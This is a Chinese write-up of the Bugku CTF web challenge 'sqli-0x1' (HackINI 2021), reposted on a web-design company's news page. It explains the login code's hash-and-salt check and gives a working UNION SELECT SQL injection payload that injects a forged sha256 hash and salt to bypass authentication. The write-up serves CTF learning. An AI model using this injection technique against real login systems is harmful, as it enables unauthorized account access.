尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

Bugku-Web题目-sqli-0x1- HackINI 2021 - 指南

Bugku-Web题目-sqli-0x1- HackINI 2021 - 指南
📅 发布时间:2026/6/20 2:14:07

Bugku-Web题目-sqli-0x1- HackINI 2021 - 指南

打开题目,给了一个登录框界面。

看看源代码,发现别有洞天。

打开看看,发现是一大串php代码。

总而言之,只需要知道如下几件事:

1、黑名单不拦截
2、explode() 函数将 password 的输入密码和盐分开

$split = explode('$', $result["password"]);$password_hash = $split[0];$salt = $split[1];

 3、password = 用户输入的密码 + 盐 。再取sha256进行比对

if ($password_hash === hash("sha256", $pass.$salt)) $logged_in = true;

如何解题呢?手动sql注入,创造一个新的记录,再让服务器查到这个记录,再让密码验证通过。

payload:

user:

a'union select 1,'d619e89bdaae0de8760ea721fa1ba8d9a819870b1ba82d720e7ac802270fce92$999'--+

pass:

888

通过这样的payload,服务端就会看到

SELECT * FROM users WHERE username='a'
union select
1,'d619e89bdaae0de8760ea721fa1ba8d9a819870b1ba82d720e7ac802270fce92$999'--+

这是如何实现的呢?

在 user 中的 ‘d619e89bdaae0de8760ea721fa1ba8d9a819870b1ba82d720e7ac802270fce92$999’ 是由 ‘888999’ 生成的 sha256 哈希结果,将会被用于 if ($password_hash === hash("sha256", $pass.$salt)) $logged_in = true; 密码的比对,在 ‘888999’ 中的888是用户输入的密码,999是盐,而在 ‘d619e89bdaae0de8760ea721fa1ba8d9a819870b1ba82d720e7ac802270fce92$999’ 中结尾的 $999 是 explode() 函数按照 $ 来分割的盐,在 $split = explode('$', $result["password"]);$password_hash = $split[0];$salt = $split[1]; 它用于加上用户输入的密码来计算sha256来比对。

最终得到flag

相关新闻

  • IDC iPaaS市场报告解读:独立厂商与云巨头的“双轨竞速”
  • 和橘子学AI创作【500集120实战】
  • 科林电气与利驰软件续签合作,共启数字化协同新篇章!

最新新闻

  • 杭州GEO优化公司2026年6月Top5:选型疑问与避坑全解 - GEO优化
  • 2026年最新武汉光谷科技职业技术学校联系方式及招生办电话号码 - 武汉中职最新信息发布
  • 揭秘Mac鼠标滚轮终极优化:让外接鼠标拥有触控板般的丝滑体验
  • MC9RS08KA2内部时钟与定时器深度解析:从原理到低功耗设计实战
  • 2026玉林本地人必选防水补漏检测维修公司靠谱服务商TOP5推荐:房屋渗漏水检测维修/卫生间/厨房/天花板/阳台/外墙渗漏水检测补漏维修-暗管漏水检测专业仪器精准定位漏水点 - 即刻修防水
  • PingFangSC字体实战:现代Web开发中的跨平台中文字体终极配置指南

日新闻

  • 信任的进化:技术实现详解——如何用JavaScript构建博弈论模拟器
  • Terrakube自定义工作流:如何集成OPA、Infracost等工具扩展IaC能力
  • grunt-concurrent快速入门:5分钟学会并行运行Grunt任务

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号